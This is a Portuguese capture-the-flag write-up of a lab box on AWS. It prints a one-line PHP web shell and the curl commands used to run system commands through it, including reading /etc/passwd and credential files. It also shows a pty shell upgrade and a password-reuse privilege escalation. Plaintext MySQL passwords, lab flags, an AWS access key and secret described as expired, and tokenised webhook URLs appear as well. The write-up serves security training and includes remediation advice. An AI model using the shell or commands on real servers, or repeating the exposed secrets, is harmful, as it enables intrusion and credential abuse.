# Resumo Geral dos Achados - CTF9

Este documento apresenta um resumo completo de todas as descobertas e etapas de exploração realizadas durante o CTF9.

## 📋 Índice

1. [Reconhecimento Inicial](#reconhecimento-inicial)
2. [Descobertas na Aplicação Web](#descobertas-na-aplicação-web)
3. [Exploração e Acesso Inicial](#exploração-e-acesso-inicial)
4. [Escalação de Privilégios](#escalação-de-privilégios)
5. [Informações do Sistema](#informações-do-sistema)
6. [Credenciais e Senhas Encontradas](#credenciais-e-senhas-encontradas)
7. [Flags Encontradas](#flags-encontradas)
8. [Vulnerabilidades Identificadas](#vulnerabilidades-identificadas)
9. [Informações AWS](#informações-aws)
10. [Ferramentas e Técnicas Utilizadas](#ferramentas-e-técnicas-utilizadas)

---

## 🔍 Reconhecimento Inicial

### Scan de Portas (Nmap)

**Alvo:** `100.27.15.46` (ec2-100-27-15-46.compute-1.amazonaws.com)

**Portas Abertas:**
- **Porta 80/tcp** - HTTP (Apache)
- **Porta 3306/tcp** - MySQL

**Observações:**
- Host ativo com latência de 0.64s
- 998 portas fechadas (reset)

### Enumeração de Diretórios (Gobuster)

**Comando utilizado:**
```bash
gobuster dir -u http://100.27.15.46/ -w /usr/share/wordlists/dirb/common.txt -x php,txt,html -t 50
```

**Diretórios/Arquivos Encontrados:**

| Recurso | Status | Tamanho | Observações |
|---------|--------|---------|-------------|
| `index.html` | 200 | 7988 bytes | Página principal |
| `noticias.php` | 200 | 12158 bytes | **Flag 1 encontrada aqui** |
| `shell.php` | 200 | 0 bytes | **RCE descoberto** |
| `test.txt` | 200 | 5 bytes | Arquivo de teste |
| `config/` | 301 | 313 bytes | Redirecionamento |
| `.htaccess` | 403 | 277 bytes | Acesso negado |
| `.htpasswd` | 403 | 277 bytes | Acesso negado |
| `files/` | 403 | 277 bytes | Acesso negado |
| `server-status` | 403 | 277 bytes | Acesso negado |

---

## 🌐 Descobertas na Aplicação Web

### Flag 1: Comentário HTML Oculto

**Localização:** `/var/www/blogo/noticias.php` (linha 135)

**Flag:** `Solyd{9NewsNews!!!NothingWrongHereVerySecure!!!9}`

**Descoberta:**
- Encontrada em comentário HTML no código fonte da página
- Descoberta através de análise do HTML retornado por `curl http://100.27.15.46/noticias.php`

**Código:**
```html
<header>
<!--Solyd{9NewsNews!!!NothingWrongHereVerySecure!!!9}-->
```

### Shell PHP (RCE)

**Arquivo:** `/var/www/blogo/shell.php`

**Conteúdo:**
```php
<?php if(isset($_GET['cmd'])){system($_GET['cmd']);}?>
```

**Vulnerabilidade:** Remote Code Execution (RCE) através do parâmetro `cmd` na URL

**Uso:**
```bash
curl "http://100.27.15.46/shell.php?cmd=COMANDO_AQUI"
```

---

## 🚀 Exploração e Acesso Inicial

### Acesso Inicial via RCE

**Método:** Exploração do `shell.php` para execução de comandos remotos

**Comandos Executados:**
- `cat /etc/passwd` - Listagem de usuários do sistema
- `cat /flag.txt` - **Flag 2 encontrada**
- `ls -la /var/www/blogo` - Enumeração de arquivos
- `cat /var/www/blogo/config/config.php` - Leitura de credenciais

### Flag 2: Arquivo na Raiz

**Localização:** `/flag.txt`

**Flag:** `Solyd{#!UhOh#!Y0uAr3In#!#941}`

**Descoberta:**
- Primeira flag encontrada após obter RCE
- Arquivo listado ao executar `ls -la /`

### Estabilização de Shell

**Problema:** Shell inicial limitada sem recursos interativos

**Solução:** Uso de Python para criar pseudo-terminal

**Comando:**
```python
python3 -c 'import pty; pty.spawn("/bin/bash")'
```

**Resultado:** Shell interativa completa com histórico, autocompletar e melhor controle

---

## 🔐 Escalação de Privilégios

### Credenciais Encontradas

**Arquivo:** `/var/www/blogo/config/config.php`

**Credenciais MySQL:**
- **Usuário:** `blogodb`
- **Senha:** `WPcmqw16ZmzO!5paSC4`
- **Banco:** `blogodb`
- **Host:** `127.0.0.1:3306`

### Escalação: www-data → adalberto

**Método:** Reutilização de senha encontrada

**Comando:**
```bash
su adalberto
Password: WPcmqw16ZmzO!5paSC4
```

**Resultado:** ✅ Sucesso - Acesso como usuário `adalberto`

### Flag 3: Diretório Home do Usuário

**Localização:** `/home/adalberto/flag.txt`

**Flag:** `Solyd{Its*Always*Easier*To*Have*One*Strong*Password}`

**Descoberta:**
- Encontrada após escalação de privilégios
- Arquivo no diretório home do usuário `adalberto`

### Privilégios Sudo do Usuário adalberto

**Comando:** `sudo -l`

**Resultado:**
```
User adalberto may run the following commands on ip-10-0-162-252:
    (ALL : ALL) NOPASSWD: /usr/local/bin/below *, !/usr/local/bin/below
```

**Observação:** Usuário pode executar `/usr/local/bin/below` com qualquer argumento (exceto o próprio binário) sem senha

**Ferramenta:** `below` - Ferramenta de monitoramento de sistema (similar ao `htop`)

---

## 💻 Informações do Sistema

### Sistema Operacional

- **OS:** Linux (Ubuntu 24.04.2 LTS)
- **Kernel:** 6.8.0-1021-aws
- **Hostname:** ip-10-0-162-252
- **Arquitetura:** x86_64

### Ambiente

- **Container:** Docker (detectado via `.dockerenv`)
- **AppArmor:** Habilitado (perfil: docker-default)
- **Seccomp:** Habilitado
- **User Namespace:** Habilitado

### Serviços em Execução

1. **Apache2** (porta 80)
   - Versão: Apache/2.4.58 (Ubuntu)
   - Usuário: www-data
   - DocumentRoot: `/var/www/blogo`

2. **MySQL** (porta 3306)
   - Versão: MySQL 8.0.44
   - Usuário: mysql
   - Datadir: `/var/lib/mysql`

### Usuários do Sistema

**Usuários com shell:**
- `root` (UID 0)
- `ubuntu` (UID 1000)
- `adalberto` (UID 1001)
- `www-data` (UID 33) - Servidor web
- `mysql` (UID 100) - Servidor de banco de dados

### Estrutura de Diretórios Importantes

```
/var/www/blogo/          # Aplicação web principal
├── config/
│   └── config.php       # Credenciais MySQL
├── files/               # Diretório de arquivos
├── shell.php            # RCE vulnerável
├── noticias.php         # Flag 1 no código
└── index.html

/home/adalberto/         # Home do usuário
└── flag.txt             # Flag 3

/flag.txt                # Flag 2 (raiz)
```

---

## 🔑 Credenciais e Senhas Encontradas

### 1. Credenciais MySQL

**Localização:** `/var/www/blogo/config/config.php`

```php
'user' => 'blogodb',
'pass' => 'WPcmqw16ZmzO!5paSC4',
'name' => 'blogodb',
```

**Reutilização:** ✅ Senha reutilizada para fazer `su` como usuário `adalberto`

### 2. Credenciais em settings.json

**Localização:** `/var/www/blogo/files/settings.json`

```json
{
  "database": {
    "username": "blogodb",
    "password": "WPcmqw16ZmzO!5paSC4"
  }
}
```

### 3. Hashes MD5

**Localização:** `/usr/share/profile.md5sums`

**Total:** 11 hashes MD5 encontradas

1. `4a409a5f2242928822658b14918b2ee1`
2. `61a3f85a2dc30f4e920f615109137be5`
3. `67f902de4d3fb8cd2f4778cad06d9b17`
4. `863ed3bf8041b035234cce25d4792fdd`
5. `9519666d98e08940df6f25dcf4598bef`
6. `9a279ae6bdd1251f64b7e70e960ef00d`
7. `aa3516b5ca8ed326d75e56cc856e7d48`
8. `b59ea6ac3a1ad8c0527ec94f73bafca0`
9. `c3a1d42cddcc565f16b48eb9c2119d9d`
10. `85a2a7227b884e4c84ff950626fcc89f`
11. `9d5ee34149287021622dd9e21c17ec26`

**Propósito:** Checksums MD5 de arquivos relacionados ao perfil do sistema

---

## 🏴 Flags Encontradas

| # | Flag | Localização | Método |
|---|------|-------------|--------|
| 1 | `Solyd{9NewsNews!!!NothingWrongHereVerySecure!!!9}` | `/var/www/blogo/noticias.php` (comentário HTML) | Análise de código fonte |
| 2 | `Solyd{#!UhOh#!Y0uAr3In#!#941}` | `/flag.txt` (raiz) | RCE via `shell.php` |
| 3 | `Solyd{Its*Always*Easier*To*Have*One*Strong*Password}` | `/home/adalberto/flag.txt` | Escalação de privilégios |

---

## 🐛 Vulnerabilidades Identificadas

### 1. Remote Code Execution (RCE)

**Severidade:** 🔴 CRÍTICA

**Arquivo:** `/var/www/blogo/shell.php`

**Código Vulnerável:**
```php
<?php if(isset($_GET['cmd'])){system($_GET['cmd']);}?>
```

**Impacto:**
- Execução arbitrária de comandos no servidor
- Acesso completo ao sistema como usuário `www-data`
- Possibilidade de escalação de privilégios

**Recomendação:** Remover o arquivo ou implementar validação rigorosa de entrada

### 2. Exposição de Credenciais

**Severidade:** 🟠 ALTA

**Arquivos Afetados:**
- `/var/www/blogo/config/config.php`
- `/var/www/blogo/files/settings.json`

**Problema:**
- Credenciais de banco de dados expostas em arquivos acessíveis via web
- Senha reutilizada para autenticação de usuário do sistema

**Recomendação:**
- Mover arquivos de configuração para fora do DocumentRoot
- Usar variáveis de ambiente
- Implementar diferentes senhas para diferentes serviços

### 3. Reutilização de Senhas

**Severidade:** 🟠 ALTA

**Problema:**
- Mesma senha usada para MySQL e autenticação de usuário `adalberto`
- Facilita escalação de privilégios

**Recomendação:**
- Implementar políticas de senhas únicas
- Usar gerenciadores de senhas
- Implementar autenticação de dois fatores

### 4. Arquivo shell.php Exposto

**Severidade:** 🔴 CRÍTICA

**Problema:**
- Arquivo com código malicioso acessível publicamente
- Permissões: `-rw-r-----` (leitura para grupo)

**Recomendação:**
- Remover arquivos de teste/produção
- Implementar lista de negação para arquivos sensíveis
- Revisar permissões de arquivos

### 5. Diretório files Acessível

**Severidade:** 🟡 MÉDIA

**Problema:**
- Diretório `/var/www/blogo/files` contém arquivos sensíveis
- Configuração Apache restringe apenas acesso local

**Recomendação:**
- Revisar configuração de acesso
- Implementar autenticação adequada

---

## ☁️ Informações AWS

### Instância EC2

**Tipo:** AWS EC2

**Detalhes:**
- **Instance ID:** `i-047f85e8db0060373`
- **Instance Type:** `t3a.micro`
- **AMI ID:** `ami-020525ce7bc4004f0`
- **Region:** `us-east-1`
- **Lifecycle:** `on-demand`
- **Account ID:** `317608390162`

### Rede

**IPs:**
- **Private IPv4:** `3.215.135.11`
- **Public IPv4:** `3.215.135.11`
- **MAC Address:** `02:8d:c9:a8:c7:33`

**Subnet:**
- **IPv4:** `10.0.0.0/16`

**Security Groups:**
- `labs-ctfs-sg`

### Credenciais AWS (Temporárias)

**Tipo:** AWS-HMAC

**Access Key ID:** `ASIAUT4XPNYJJVRTMKXX`

**Secret Access Key:** `gLBKzW1h7fTSi3dYnHSo1ms1Vjtk6xCCfXE/UK46`

**Token:** (Token STS longo - expirado em 2026-02-10T04:38:49Z)

**Observação:** ⚠️ Credenciais temporárias expiradas - não são mais válidas

### User Data

**Script de inicialização:**
```bash
#!/bin/bash
sudo systemctl stop ssh.socket
sudo systemctl disable ssh.socket
cd /home/ubuntu && sudo docker compose up -d
START_TIME=$(date +%s); until sudo docker logs ctf9-box1 | grep -qEo "OK" || [ $(( $(date +%s) - START_TIME )) -ge 550 ]; do sleep 5; done; [ $(( $(date +%s) - START_TIME )) -ge 550 ] && curl -f https://solyd.com.br/aluno/ctf/webhook/CMe4WWlDMlokv9Eu6CVBEAoeZ1OsEiVj/check-connection/b8dc660b-2337-46fc-bb17-322be49f3926/0/ || curl -f https://solyd.com.br/aluno/ctf/webhook/CMe4WWlDMlokv9Eu6CVBEAoeZ1OsEiVj/check-connection/b8dc660b-2337-46fc-bb17-322be49f3926/1/
```

**Observações:**
- SSH desabilitado na inicialização
- Container Docker iniciado automaticamente
- Webhook de verificação de conexão

---

## 🛠️ Ferramentas e Técnicas Utilizadas

### Ferramentas de Reconhecimento

1. **Nmap**
   - Scan de portas
   - Identificação de serviços

2. **Gobuster**
   - Enumeração de diretórios web
   - Descoberta de arquivos e endpoints

3. **curl**
   - Testes de requisições HTTP
   - Exploração de endpoints
   - Execução de comandos via RCE

### Ferramentas de Exploração

1. **Python3**
   - Estabilização de shell (`pty.spawn`)
   - Scripts de automação

2. **LinPEAS**
   - Enumeração automatizada de privilégios
   - Análise de configurações do sistema
   - Identificação de vetores de escalação

3. **netcat (nc)**
   - Shell reversa
   - Comunicação de rede

### Técnicas Aplicadas

1. **Reconhecimento Web**
   - Análise de código fonte HTML
   - Enumeração de diretórios
   - Identificação de arquivos expostos

2. **Remote Code Execution (RCE)**
   - Exploração de vulnerabilidade em `shell.php`
   - Execução de comandos remotos
   - Acesso inicial ao sistema

3. **Escalação de Privilégios**
   - Reutilização de credenciais
   - Exploração de privilégios sudo
   - Análise de configurações do sistema

4. **Enumeração de Sistema**
   - Exploração de diretórios
   - Leitura de arquivos de configuração
   - Identificação de credenciais

5. **Análise de Container**
   - Identificação de ambiente Docker
   - Análise de namespaces
   - Verificação de mecanismos de segurança

---

## 📊 Estatísticas da Exploração

- **Total de Flags:** 3
- **Vulnerabilidades Críticas:** 2
- **Vulnerabilidades Altas:** 2
- **Credenciais Encontradas:** 1 senha (reutilizada)
- **Hashes MD5:** 11
- **Usuários Escalados:** 2 (www-data → adalberto)
- **Portas Abertas:** 2 (80, 3306)
- **Arquivos Sensíveis Expostos:** 3+

---

## 🎯 Lições Aprendidas

### Segurança Web

1. **Nunca exponha arquivos de shell/backdoor em produção**
2. **Valide e sanitize todas as entradas do usuário**
3. **Mantenha arquivos de configuração fora do DocumentRoot**
4. **Implemente listas de negação para arquivos sensíveis**

### Gerenciamento de Credenciais

1. **Nunca reutilize senhas entre serviços**
2. **Use variáveis de ambiente para credenciais**
3. **Implemente políticas de senhas fortes**
4. **Use gerenciadores de senhas**

### Segurança de Container

1. **Configure adequadamente AppArmor/SELinux**
2. **Limite capacidades do container**
3. **Use namespaces apropriados**
4. **Monitore processos em execução**

### Monitoramento

1. **Implemente logging adequado**
2. **Monitore tentativas de acesso não autorizado**
3. **Revise regularmente permissões de arquivos**
4. **Use ferramentas de detecção de intrusão**

---

## 📝 Conclusão

Este CTF demonstrou várias vulnerabilidades comuns em ambientes web:

1. **RCE através de arquivo exposto** - Acesso inicial ao sistema
2. **Exposição de credenciais** - Facilita escalação de privilégios
3. **Reutilização de senhas** - Permite acesso a múltiplos recursos
4. **Falta de validação de entrada** - Permite execução de comandos arbitrários

A exploração bem-sucedida resultou na descoberta de 3 flags e demonstrou a importância de implementar práticas adequadas de segurança em todas as camadas da aplicação.

---

**Data da Exploração:** 09/02/2026  
**Duração Aproximada:** ~23 minutos (uptime do sistema)  
**Nível de Dificuldade:** Intermediário
